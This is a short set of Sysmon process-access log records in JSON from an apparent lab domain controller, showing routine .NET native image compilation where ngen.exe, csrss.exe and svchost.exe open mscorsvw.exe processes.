{"EventTime":"2020-08-01 07:01:11","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7772,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:11.090\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1337-5F25-0000-0010436E0C00}\r\nTargetProcessId: 4828\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:11.090","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1337-5F25-0000-0010436E0C00}","TargetProcessId":"4828","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:11","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7773,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:11.090\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1337-5F25-0000-0010436E0C00}\r\nTargetProcessId: 4828\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:11.090","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1337-5F25-0000-0010436E0C00}","TargetProcessId":"4828","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:11","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7774,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:11.106\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1337-5F25-0000-0010436E0C00}\r\nTargetProcessId: 4828\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:11.106","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1337-5F25-0000-0010436E0C00}","TargetProcessId":"4828","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:11","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7775,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:11.137\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1337-5F25-0000-0010BE710C00}\r\nTargetProcessId: 3052\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:11.137","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1337-5F25-0000-0010BE710C00}","TargetProcessId":"3052","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:11","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7776,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:11.137\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1337-5F25-0000-0010BE710C00}\r\nTargetProcessId: 3052\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:11.137","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1337-5F25-0000-0010BE710C00}","TargetProcessId":"3052","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:11","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7777,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:11.137\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1337-5F25-0000-0010BE710C00}\r\nTargetProcessId: 3052\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:11.137","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1337-5F25-0000-0010BE710C00}","TargetProcessId":"3052","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:11","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7778,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:11.231\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1337-5F25-0000-0010C3750C00}\r\nTargetProcessId: 4548\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:11.231","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1337-5F25-0000-0010C3750C00}","TargetProcessId":"4548","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:11","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7779,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:11.231\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1337-5F25-0000-0010C3750C00}\r\nTargetProcessId: 4548\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:11.231","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1337-5F25-0000-0010C3750C00}","TargetProcessId":"4548","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
